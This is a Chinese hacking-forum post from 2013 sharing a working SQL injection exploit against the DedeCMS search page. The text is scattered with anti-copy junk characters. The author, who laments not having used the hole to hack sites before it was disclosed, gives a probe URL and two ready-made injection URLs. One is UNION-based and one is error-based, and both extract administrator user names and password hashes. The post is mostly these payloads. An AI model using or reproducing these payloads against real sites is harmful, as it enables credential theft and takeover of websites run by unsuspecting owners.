中国网络渗透测试联盟

标题: [通杀]dedecms plus/search.php 注入漏洞利用EXP [打印本页]

作者: admin    时间: 2013-1-21 08:45
标题: [通杀]dedecms plus/search.php 注入漏洞利用EXP
转载不加作者名的没JJ# h3 t9 Q% E. y2 U  O" @; J- \* U

/ H8 Z1 H! m! R. K' \哎。没意识,我一个月前就发现了这个漏洞,一直也没去黑站  放那 现在狗卵的什么 知道创宇 发出来了。郁闷。。可惜了我的洞辛苦看了2天的dedecms漏洞就这样没了。( q! o4 W2 p( `* \
8 b  l1 I; \8 w- `% Q
既然已经发出来了,我就把我自己搞的exp发下吧。。唉。
1 G* S! K/ |) N& u* |
8 x, S0 a" q3 O* X0 X+ M/ h; c: n我一般是这样测试的:
3 K  Z$ x' s" y! @
' A1 @8 W9 e7 o& T" q提交 xx.com/plus/search.php?keyword=as&typeArr[ uNion ]=a) W+ e. }& l6 }, b; G" a2 w" _

, k  M% D8 _' `" |转载不加作者名的没JJ1 l$ W0 ]$ @) M! c1 W6 A

9 J7 o3 L  ]. R6 k9 m9 z$ _7 u  k" d作者:鬼哥
& Z$ h6 M  P6 o( O* C3 G" Y$ d' a: E7 A5 `" [" e

) a* t' }% O: W+ w3 r, n3 C
' x% [1 t# L0 h( `( p! j. H看结果如果提示
5 a- x% K9 ^& a5 f( y- {
. T8 L8 r& R* g6 N% y+ LSafe Alert: Request Error step 2 !
+ ?7 k2 p6 q" L  s, M1 n4 C- T: v( ], r" \) B, k* s# ]) a/ A
那么直接用下面的exp4 r3 I1 l" e! a, ~* ?+ m$ s

5 E# R: s6 Z$ ^* A2 l+ `. k; u" ]xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a  I  g) C+ G/ F  ?9 e0 u2 x* y4 V
2 A; K' x( [# e; q/ N+ V0 K' i

! x6 z$ W$ ^& ^7 k: n看结果如果提示& P1 y7 @% W; m( T& D3 t) Y* u7 H6 @
- Y8 }5 ]* u8 G( b3 N
Safe Alert: Request Error step 1 !: r, }0 ~7 c1 O* d# n

: \. ]1 n. F) J9 [4 J那么直接用下面的exp
+ v4 _4 R0 g! Z( t
. e9 N; u. P7 ^6 I$ b9 L; dxx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a3 b1 C% e- o8 u; X1 @
. G, `" y) A, F1 ^

+ `5 G  F9 r; \0 H如果正常显示证明漏洞不存在了。  W. W: w4 h4 `7 t- F8 Y+ F9 @
  ^+ A( }( g7 n6 Y; q
转载不加作者名的没JJ




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2